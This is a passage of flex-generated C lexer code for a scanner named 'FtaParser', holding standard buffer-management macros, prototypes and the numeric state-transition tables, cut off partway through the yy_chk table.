#endif /* ! C99 */
#endif /* ! FLEXINT_H */
#ifdef __cplusplus
/* The "const" storage-class-modifier is valid. */
#define YY_USE_CONST
#else /* ! __cplusplus */
/* C99 requires __STDC__ to be defined as 1. */
#if defined (__STDC__)
#define YY_USE_CONST
#endif /* defined (__STDC__) */
#endif /* ! __cplusplus */
#ifdef YY_USE_CONST
#define yyconst const
#else
#define yyconst
#endif
/* Returned upon end-of-file. */
#define YY_NULL 0
/* Promotes a possibly negative, possibly signed char to an unsigned
* integer for use as an array index. If the signed char is negative,
* we want to instead treat it as an 8-bit unsigned char, hence the
* double cast.
*/
#define YY_SC_TO_UI(c) ((unsigned int) (unsigned char) c)
/* Enter a start condition. This macro really ought to take a parameter,
* but we do it the disgusting crufty way forced on us by the ()-less
* definition of BEGIN.
*/
#define BEGIN (yy_start) = 1 + 2 *
/* Translate the current start state into a value that can be later handed
* to BEGIN to return to the state. The YYSTATE alias is for lex
* compatibility.
*/
#define YY_START (((yy_start) - 1) / 2)
#define YYSTATE YY_START
/* Action number for EOF rule of a given start state. */
#define YY_STATE_EOF(state) (YY_END_OF_BUFFER + state + 1)
/* Special action meaning "start processing a new file". */
#define YY_NEW_FILE FtaParserrestart(FtaParserin )
#define YY_END_OF_BUFFER_CHAR 0
/* Size of default input buffer. */
#ifndef YY_BUF_SIZE
#ifdef __ia64__
/* On IA-64, the buffer size is 16k, not 8k.
* Moreover, YY_BUF_SIZE is 2*YY_READ_BUF_SIZE in the general case.
* Ditto for the __ia64__ case accordingly.
*/
#define YY_BUF_SIZE 32768
#else
#define YY_BUF_SIZE 16384
#endif /* __ia64__ */
#endif
/* The state buf must be large enough to hold one state per character in the main buffer.
*/
#define YY_STATE_BUF_SIZE ((YY_BUF_SIZE + 2) * sizeof(yy_state_type))
#ifndef YY_TYPEDEF_YY_BUFFER_STATE
#define YY_TYPEDEF_YY_BUFFER_STATE
typedef struct yy_buffer_state *YY_BUFFER_STATE;
#endif
#ifndef YY_TYPEDEF_YY_SIZE_T
#define YY_TYPEDEF_YY_SIZE_T
typedef size_t yy_size_t;
#endif
extern yy_size_t FtaParserleng;
extern FILE *FtaParserin, *FtaParserout;
#define EOB_ACT_CONTINUE_SCAN 0
#define EOB_ACT_END_OF_FILE 1
#define EOB_ACT_LAST_MATCH 2
#define YY_LESS_LINENO(n)
#define YY_LINENO_REWIND_TO(ptr)
/* Return all but the first "n" matched characters back to the input stream. */
#define yyless(n) \
do \
{ \
/* Undo effects of setting up FtaParsertext. */ \
int yyless_macro_arg = (n); \
YY_LESS_LINENO(yyless_macro_arg);\
*yy_cp = (yy_hold_char); \
YY_RESTORE_YY_MORE_OFFSET \
(yy_c_buf_p) = yy_cp = yy_bp + yyless_macro_arg - YY_MORE_ADJ; \
YY_DO_BEFORE_ACTION; /* set up FtaParsertext again */ \
} \
while ( 0 )
#define unput(c) yyunput( c, (yytext_ptr) )
#ifndef YY_STRUCT_YY_BUFFER_STATE
#define YY_STRUCT_YY_BUFFER_STATE
struct yy_buffer_state
{
FILE *yy_input_file;
char *yy_ch_buf; /* input buffer */
char *yy_buf_pos; /* current position in input buffer */
/* Size of input buffer in bytes, not including room for EOB
* characters.
*/
yy_size_t yy_buf_size;
/* Number of characters read into yy_ch_buf, not including EOB
* characters.
*/
int yy_n_chars;
/* Whether we "own" the buffer - i.e., we know we created it,
* and can realloc() it to grow it, and should free() it to
* delete it.
*/
int yy_is_our_buffer;
/* Whether this is an "interactive" input source; if so, and
* if we're using stdio for input, then we want to use getc()
* instead of fread(), to make sure we stop fetching input after
* each newline.
*/
int yy_is_interactive;
/* Whether we're considered to be at the beginning of a line.
* If so, '^' rules will be active on the next match, otherwise
* not.
*/
int yy_at_bol;
int yy_bs_lineno; /**< The line count. */
int yy_bs_column; /**< The column count. */
/* Whether to try to fill the input buffer when we reach the
* end of it.
*/
int yy_fill_buffer;
int yy_buffer_status;
#define YY_BUFFER_NEW 0
#define YY_BUFFER_NORMAL 1
/* When an EOF's been seen but there's still some text to process
* then we mark the buffer as YY_EOF_PENDING, to indicate that we
* shouldn't try reading from the input source any more. We might
* still have a bunch of tokens to match, though, because of
* possible backing-up.
*
* When we actually see the EOF, we change the status to "new"
* (via FtaParserrestart()), so that the user can continue scanning by
* just pointing FtaParserin at a new input file.
*/
#define YY_BUFFER_EOF_PENDING 2
};
#endif /* !YY_STRUCT_YY_BUFFER_STATE */
/* Stack of input buffers. */
static size_t yy_buffer_stack_top = 0; /**< index of top of stack. */
static size_t yy_buffer_stack_max = 0; /**< capacity of stack. */
static YY_BUFFER_STATE * yy_buffer_stack = 0; /**< Stack as an array. */
/* We provide macros for accessing buffer states in case in the
* future we want to put the buffer states in a more general
* "scanner state".
*
* Returns the top of the stack, or NULL.
*/
#define YY_CURRENT_BUFFER ( (yy_buffer_stack) \
? (yy_buffer_stack)[(yy_buffer_stack_top)] \
: NULL)
/* Same as previous macro, but useful when we know that the buffer stack is not
* NULL or when we need an lvalue. For internal use only.
*/
#define YY_CURRENT_BUFFER_LVALUE (yy_buffer_stack)[(yy_buffer_stack_top)]
/* yy_hold_char holds the character lost when FtaParsertext is formed. */
static char yy_hold_char;
static int yy_n_chars; /* number of characters read into yy_ch_buf */
yy_size_t FtaParserleng;
/* Points to current character in buffer. */
static char *yy_c_buf_p = (char *) 0;
static int yy_init = 0; /* whether we need to initialize */
static int yy_start = 0; /* start state number */
/* Flag which is used to allow FtaParserwrap()'s to do buffer switches
* instead of setting up a fresh FtaParserin. A bit of a hack ...
*/
static int yy_did_buffer_switch_on_eof;
void FtaParserrestart (FILE *input_file );
void FtaParser_switch_to_buffer (YY_BUFFER_STATE new_buffer );
YY_BUFFER_STATE FtaParser_create_buffer (FILE *file,int size );
void FtaParser_delete_buffer (YY_BUFFER_STATE b );
void FtaParser_flush_buffer (YY_BUFFER_STATE b );
void FtaParserpush_buffer_state (YY_BUFFER_STATE new_buffer );
void FtaParserpop_buffer_state (void );
static void FtaParserensure_buffer_stack (void );
static void FtaParser_load_buffer_state (void );
static void FtaParser_init_buffer (YY_BUFFER_STATE b,FILE *file );
#define YY_FLUSH_BUFFER FtaParser_flush_buffer(YY_CURRENT_BUFFER )
YY_BUFFER_STATE FtaParser_scan_buffer (char *base,yy_size_t size );
YY_BUFFER_STATE FtaParser_scan_string (yyconst char *yy_str );
YY_BUFFER_STATE FtaParser_scan_bytes (yyconst char *bytes,yy_size_t len );
void *FtaParseralloc (yy_size_t );
void *FtaParserrealloc (void *,yy_size_t );
void FtaParserfree (void * );
#define yy_new_buffer FtaParser_create_buffer
#define yy_set_interactive(is_interactive) \
{ \
if ( ! YY_CURRENT_BUFFER ){ \
FtaParserensure_buffer_stack (); \
YY_CURRENT_BUFFER_LVALUE = \
FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE ); \
} \
YY_CURRENT_BUFFER_LVALUE->yy_is_interactive = is_interactive; \
}
#define yy_set_bol(at_bol) \
{ \
if ( ! YY_CURRENT_BUFFER ){\
FtaParserensure_buffer_stack (); \
YY_CURRENT_BUFFER_LVALUE = \
FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE ); \
} \
YY_CURRENT_BUFFER_LVALUE->yy_at_bol = at_bol; \
}
#define YY_AT_BOL() (YY_CURRENT_BUFFER_LVALUE->yy_at_bol)
/* Begin user sect3 */
#define FtaParserwrap() (/*CONSTCOND*/1)
#define YY_SKIP_YYWRAP
typedef unsigned char YY_CHAR;
FILE *FtaParserin = (FILE *) 0, *FtaParserout = (FILE *) 0;
typedef int yy_state_type;
extern int FtaParserlineno;
int FtaParserlineno = 1;
extern char *FtaParsertext;
#ifdef yytext_ptr
#undef yytext_ptr
#endif
#define yytext_ptr FtaParsertext
static yy_state_type yy_get_previous_state (void );
static yy_state_type yy_try_NUL_trans (yy_state_type current_state );
static int yy_get_next_buffer (void );
#if defined(__GNUC__) && __GNUC__ >= 3
__attribute__((__noreturn__))
#endif
static void yy_fatal_error (yyconst char msg[] );
/* Done after the current pattern has been matched and before the
* corresponding action - sets up FtaParsertext.
*/
#define YY_DO_BEFORE_ACTION \
(yytext_ptr) = yy_bp; \
(yytext_ptr) -= (yy_more_len); \
FtaParserleng = (size_t) (yy_cp - (yytext_ptr)); \
(yy_hold_char) = *yy_cp; \
*yy_cp = '\0'; \
(yy_c_buf_p) = yy_cp;
#define YY_NUM_RULES 87
#define YY_END_OF_BUFFER 88
/* This struct is not used in this scanner,
but its presence is necessary. */
struct yy_trans_info
{
flex_int32_t yy_verify;
flex_int32_t yy_nxt;
};
static yyconst flex_int16_t yy_accept[692] =
{ 0,
0, 0, 88, 86, 83, 82, 68, 86, 69, 68,
68, 72, 59, 64, 62, 65, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 47, 48, 70, 83, 82, 0, 81, 80,
0, 76, 0, 75, 72, 0, 0, 60, 66, 63,
67, 61, 71, 71, 27, 71, 71, 71, 10, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 28, 71, 28,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 30, 71, 30, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 28,
71, 71, 71, 71, 71, 30, 71, 71, 71, 71,
71, 71, 71, 71, 71, 0, 84, 0, 0, 85,
75, 0, 0, 77, 73, 1, 5, 1, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 52, 71, 71, 71, 71, 71, 41, 71, 71,
71, 71, 71, 71, 71, 71, 71, 7, 71, 6,
71, 29, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 8, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 1, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 0, 79,
0, 78, 74, 71, 71, 71, 71, 71, 20, 71,
71, 71, 71, 71, 71, 71, 11, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 42, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 33, 71, 71,
71, 71, 34, 71, 38, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 9, 71, 71, 71, 39,
71, 71, 71, 18, 18, 71, 71, 71, 71, 71,
71, 71, 71, 71, 35, 71, 71, 71, 71, 71,
46, 71, 71, 71, 71, 71, 71, 36, 71, 71,
71, 71, 71, 49, 71, 71, 71, 32, 71, 71,
71, 71, 71, 71, 71, 18, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 45, 56, 71, 71, 71, 71, 26,
71, 71, 43, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 19, 71, 31, 51, 71, 71,
31, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 3, 71,
71, 71, 71, 71, 71, 71, 71, 71, 40, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 2, 71, 71, 71,
71, 71, 71, 71, 71, 71, 44, 71, 71, 71,
54, 71, 71, 50, 71, 71, 71, 71, 71, 71,
71, 71, 71, 4, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 37, 37, 71, 71,
71, 71, 71, 71, 71, 71, 71, 37, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 12, 71,
71, 71, 13, 71, 71, 71, 57, 22, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 24,
71, 71, 71, 71, 17, 71, 71, 71, 71, 71,
71, 71, 71, 53, 71, 71, 71, 71, 71, 71,
71, 71, 71, 25, 71, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 71, 71,
23, 21, 71, 71, 55, 71, 71, 71, 71, 71,
71, 71, 71, 71, 71, 71, 71, 71, 16, 71,
71, 15, 71, 71, 71, 71, 14, 71, 71, 58,
0
} ;
static yyconst YY_CHAR yy_ec[256] =
{ 0,
1, 1, 1, 1, 1, 1, 1, 1, 2, 3,
1, 1, 2, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 2, 4, 1, 4, 4, 4, 4, 5, 4,
4, 4, 6, 4, 7, 8, 9, 10, 10, 10,
10, 10, 10, 11, 10, 10, 10, 4, 12, 13,
14, 15, 1, 4, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
4, 1, 4, 1, 42, 1, 43, 44, 45, 46,
47, 48, 49, 50, 51, 52, 41, 53, 54, 55,
56, 57, 41, 58, 59, 60, 61, 62, 63, 64,
65, 41, 66, 4, 67, 68, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1
} ;
static yyconst YY_CHAR yy_meta[69] =
{ 0,
1, 1, 2, 1, 1, 1, 1, 1, 1, 3,
3, 1, 1, 1, 1, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 3, 3,
3, 3, 3, 3, 3, 1, 1, 1
} ;
static yyconst flex_uint16_t yy_base[697] =
{ 0,
0, 0, 814, 815, 811, 0, 815, 66, 805, 62,
802, 66, 815, 65, 815, 67, 55, 30, 63, 790,
0, 72, 42, 78, 54, 81, 102, 73, 75, 99,
101, 107, 123, 780, 121, 82, 96, 743, 106, 90,
749, 763, 750, 757, 118, 747, 102, 84, 119, 752,
127, 745, 815, 815, 815, 798, 0, 169, 815, 815,
796, 165, 795, 168, 173, 180, 770, 815, 815, 815,
815, 815, 0, 777, 0, 773, 748, 744, 0, 67,
756, 774, 142, 729, 745, 767, 760, 172, 756, 769,
731, 727, 752, 725, 743, 740, 716, 748, 159, 721,
754, 754, 725, 733, 738, 741, 705, 710, 712, 731,
705, 744, 721, 727, 719, 700, 726, 728, 735, 729,
706, 701, 726, 736, 718, 177, 697, 157, 732, 732,
719, 710, 702, 713, 708, 722, 681, 693, 706, 680,
691, 687, 150, 674, 690, 680, 676, 675, 668, 674,
680, 663, 668, 670, 664, 681, 662, 672, 667, 666,
159, 675, 657, 669, 657, 711, 815, 212, 710, 815,
214, 220, 218, 222, 685, 669, 0, 668, 693, 674,
678, 686, 662, 645, 648, 655, 677, 666, 672, 663,
669, 0, 636, 641, 658, 632, 668, 0, 640, 670,
678, 651, 676, 639, 650, 645, 623, 0, 660, 0,
632, 0, 647, 663, 658, 661, 629, 659, 639, 650,
645, 621, 617, 649, 650, 647, 634, 642, 0, 644,
616, 612, 614, 633, 624, 638, 637, 596, 639, 636,
620, 607, 593, 608, 607, 606, 604, 587, 590, 597,
583, 588, 580, 589, 592, 578, 588, 593, 588, 584,
580, 585, 581, 583, 569, 583, 569, 584, 225, 227,
229, 231, 815, 609, 608, 594, 598, 586, 0, 565,
568, 558, 588, 596, 596, 594, 0, 566, 581, 554,
581, 554, 575, 565, 590, 563, 546, 561, 0, 560,
581, 553, 583, 576, 564, 547, 537, 566, 563, 557,
555, 530, 528, 570, 561, 570, 549, 0, 551, 538,
524, 561, 0, 543, 0, 561, 555, 557, 526, 528,
558, 557, 529, 516, 519, 509, 521, 510, 511, 507,
522, 516, 513, 503, 500, 498, 513, 499, 506, 508,
511, 531, 503, 527, 521, 0, 498, 493, 527, 0,
512, 512, 486, 519, 491, 519, 491, 497, 501, 510,
499, 493, 504, 503, 0, 497, 509, 488, 480, 486,
0, 509, 484, 494, 482, 466, 487, 0, 493, 500,
497, 458, 468, 0, 500, 489, 487, 0, 460, 490,
462, 461, 458, 453, 449, 455, 456, 462, 447, 453,
459, 458, 442, 438, 448, 443, 446, 472, 444, 463,
469, 435, 440, 0, 0, 446, 445, 457, 430, 0,
459, 467, 0, 466, 456, 444, 418, 448, 444, 451,
417, 449, 443, 442, 0, 441, 446, 0, 436, 435,
0, 409, 439, 423, 440, 412, 440, 412, 411, 404,
409, 415, 401, 403, 393, 395, 400, 395, 392, 398,
399, 414, 388, 423, 402, 394, 400, 416, 415, 417,
389, 407, 409, 408, 378, 398, 372, 398, 0, 400,
373, 401, 391, 365, 395, 400, 393, 366, 0, 400,
386, 360, 385, 359, 358, 366, 372, 361, 363, 355,
350, 353, 347, 351, 347, 347, 0, 362, 365, 360,
363, 370, 343, 356, 355, 372, 0, 344, 374, 346,
350, 367, 339, 0, 354, 328, 358, 366, 349, 323,
365, 347, 321, 0, 338, 316, 322, 335, 325, 328,
323, 313, 311, 311, 165, 347, 226, 319, 344, 316,
332, 331, 335, 308, 329, 303, 323, 330, 303, 337,
309, 313, 320, 322, 295, 322, 308, 307, 200, 298,
296, 287, 290, 286, 288, 295, 284, 298, 299, 315,
317, 271, 285, 287, 304, 277, 311, 283, 0, 287,
286, 303, 0, 293, 267, 293, 0, 0, 289, 297,
296, 255, 269, 271, 262, 269, 49, 62, 98, 0,
180, 178, 163, 162, 0, 210, 186, 222, 223, 229,
208, 209, 216, 0, 223, 198, 208, 201, 197, 206,
217, 204, 233, 0, 210, 232, 208, 238, 213, 232,
246, 247, 239, 250, 224, 221, 218, 222, 227, 229,
0, 0, 257, 231, 0, 253, 228, 262, 257, 232,
237, 233, 235, 262, 237, 269, 243, 276, 0, 241,
246, 0, 269, 244, 270, 246, 0, 264, 274, 0,
815, 303, 306, 302, 309, 312
} ;
static yyconst flex_int16_t yy_def[697] =
{ 0,
691, 1, 691, 691, 691, 692, 691, 693, 691, 691,
691, 691, 691, 691, 691, 691, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 691, 691, 691, 691, 692, 693, 691, 691,
695, 691, 696, 691, 691, 691, 691, 691, 691, 691,
691, 691, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 695, 691, 691, 696, 691,
691, 691, 691, 691, 691, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 691, 691,
691, 691, 691, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
694, 694, 694, 694, 694, 694, 694, 694, 694, 694,
0, 691, 691, 691, 691, 691
} ;
static yyconst flex_uint16_t yy_nxt[884] =
{ 0,
4, 5, 6, 7, 8, 7, 9, 10, 11, 12,
12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 21, 21, 26, 27, 28, 29,
30, 21, 31, 32, 33, 34, 21, 35, 36, 21,
21, 21, 37, 38, 39, 21, 21, 40, 41, 42,
43, 21, 44, 45, 46, 47, 21, 48, 49, 50,
21, 21, 51, 52, 21, 53, 54, 55, 59, 79,
60, 62, 62, 64, 93, 65, 65, 68, 69, 70,
71, 72, 98, 74, 99, 66, 179, 87, 75, 80,
640, 76, 81, 95, 79, 88, 180, 96, 82, 94,
101, 67, 110, 102, 89, 112, 90, 113, 100, 77,
114, 139, 66, 75, 117, 83, 78, 104, 84, 641,
97, 105, 91, 85, 119, 106, 123, 103, 111, 92,
120, 118, 115, 124, 158, 116, 135, 140, 129, 159,
146, 125, 126, 136, 107, 130, 131, 147, 108, 642,
141, 121, 109, 127, 75, 132, 122, 142, 143, 156,
152, 144, 157, 137, 153, 160, 145, 128, 154, 163,
138, 59, 133, 60, 62, 62, 164, 171, 171, 161,
64, 589, 65, 65, 168, 173, 173, 172, 183, 174,
174, 189, 66, 227, 228, 201, 247, 184, 190, 643,
202, 232, 590, 263, 229, 248, 644, 230, 67, 645,
229, 168, 229, 233, 172, 264, 644, 269, 269, 66,
203, 270, 270, 171, 171, 271, 271, 174, 174, 272,
272, 174, 174, 172, 270, 270, 270, 270, 272, 272,
272, 272, 592, 612, 646, 647, 648, 649, 650, 651,
652, 653, 654, 655, 656, 644, 657, 658, 659, 660,
172, 661, 613, 593, 661, 662, 662, 663, 664, 665,
666, 667, 668, 669, 670, 661, 662, 671, 672, 673,
674, 675, 676, 677, 678, 679, 679, 680, 681, 679,
682, 682, 683, 684, 685, 682, 686, 687, 687, 688,
687, 689, 690, 57, 73, 57, 58, 58, 58, 166,
166, 166, 169, 169, 169, 639, 625, 638, 637, 620,
636, 635, 634, 633, 632, 631, 630, 629, 628, 627,
626, 625, 625, 624, 623, 620, 622, 621, 620, 619,
608, 618, 603, 617, 599, 616, 615, 614, 611, 610,
609, 608, 608, 607, 606, 605, 604, 603, 603, 602,
601, 600, 599, 599, 598, 597, 596, 595, 594, 591,
588, 587, 586, 585, 584, 583, 582, 581, 580, 579,
578, 577, 576, 575, 574, 573, 572, 571, 570, 569,
568, 567, 566, 565, 564, 563, 562, 561, 560, 559,
558, 557, 556, 555, 544, 554, 553, 552, 551, 550,
549, 548, 547, 546, 545, 517, 544, 544, 543, 542,
541, 540, 539, 538, 537, 536, 535, 534, 533, 532,
531, 530, 529, 528, 527, 527, 526, 525, 524, 523,
522, 521, 520, 519, 518, 517, 517, 516, 515, 514,
513, 512, 489, 511, 510, 509, 508, 507, 506, 505,
504, 503, 502, 501, 500, 499, 498, 497, 496, 495,
494, 493, 492, 491, 489, 490, 489, 488, 487, 486,
485, 484, 483, 482, 481, 480, 479, 478, 477, 476,
475, 474, 473, 472, 471, 470, 469, 451, 445, 468,
467, 466, 465, 464, 430, 463, 462, 461, 460, 459,
458, 457, 456, 455, 454, 453, 452, 451, 450, 449,
448, 447, 445, 446, 445, 444, 443, 442, 441, 440,
439, 438, 437, 436, 435, 434, 433, 432, 431, 430,
430, 429, 428, 427, 426, 425, 424, 423, 422, 421,
420, 419, 418, 417, 398, 416, 415, 414, 413, 412,
411, 410, 375, 409, 408, 407, 406, 405, 356, 404,
403, 402, 401, 400, 398, 399, 398, 397, 396, 395,
394, 393, 392, 391, 390, 389, 388, 387, 386, 385,
384, 383, 382, 381, 380, 379, 378, 377, 376, 375,
375, 374, 373, 372, 371, 370, 369, 368, 367, 366,
365, 364, 363, 362, 361, 360, 359, 356, 358, 357,
356, 355, 354, 353, 352, 351, 350, 349, 323, 348,
318, 347, 346, 345, 344, 343, 342, 341, 340, 339,
338, 287, 337, 279, 336, 335, 334, 333, 332, 331,
330, 329, 328, 327, 326, 323, 325, 324, 323, 322,
321, 318, 320, 319, 318, 317, 316, 315, 314, 313,
312, 311, 310, 309, 308, 307, 306, 305, 304, 303,
302, 301, 300, 299, 298, 297, 296, 295, 294, 293,
292, 291, 290, 289, 287, 288, 287, 286, 285, 284,
283, 279, 282, 281, 280, 279, 278, 277, 276, 275,
274, 273, 170, 167, 268, 267, 266, 265, 262, 261,
260, 259, 258, 212, 210, 257, 208, 256, 255, 254,
253, 252, 251, 250, 249, 177, 246, 245, 244, 243,
242, 241, 240, 239, 238, 237, 236, 235, 234, 231,
226, 225, 224, 223, 222, 221, 220, 219, 218, 217,
216, 215, 214, 213, 212, 212, 210, 211, 208, 210,
209, 208, 207, 206, 205, 204, 200, 199, 198, 197,
196, 195, 194, 193, 192, 191, 188, 187, 186, 185,
182, 181, 177, 178, 177, 176, 175, 170, 167, 56,
165, 162, 155, 151, 150, 149, 148, 79, 134, 86,
63, 61, 56, 691, 3, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691, 691, 691, 691, 691, 691, 691, 691,
691, 691, 691
} ;
static yyconst flex_int16_t yy_chk[884] =
{ 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 8, 18,
8, 10, 10, 12, 23, 12, 12, 14, 14, 14,
16, 16, 25, 17, 25, 12, 80, 22, 17, 19,
617, 17, 19, 24, 18, 22, 80, 24, 19, 23,
26, 12, 28, 26, 22, 29, 22, 29, 25, 17,
29, 36, 12, 17, 30, 19, 17, 27, 19, 618,
24, 27, 22, 19, 31, 27, 32, 26, 28, 22,
31, 30, 29, 32, 48, 29, 35, 36, 33, 48,
40, 32, 32, 35, 27, 33, 33, 40, 27, 619,
37, 31, 27, 32, 37, 33, 31, 37, 39, 47,
45, 39, 47, 35, 45, 49, 39, 32, 45, 51,
35, 58, 33, 58, 62, 62, 51, 64, 64, 49,
65, 555, 65, 65, 62, 66, 66, 64, 83, 66,
66, 88, 65, 126, 126, 99, 143, 83, 88, 621,
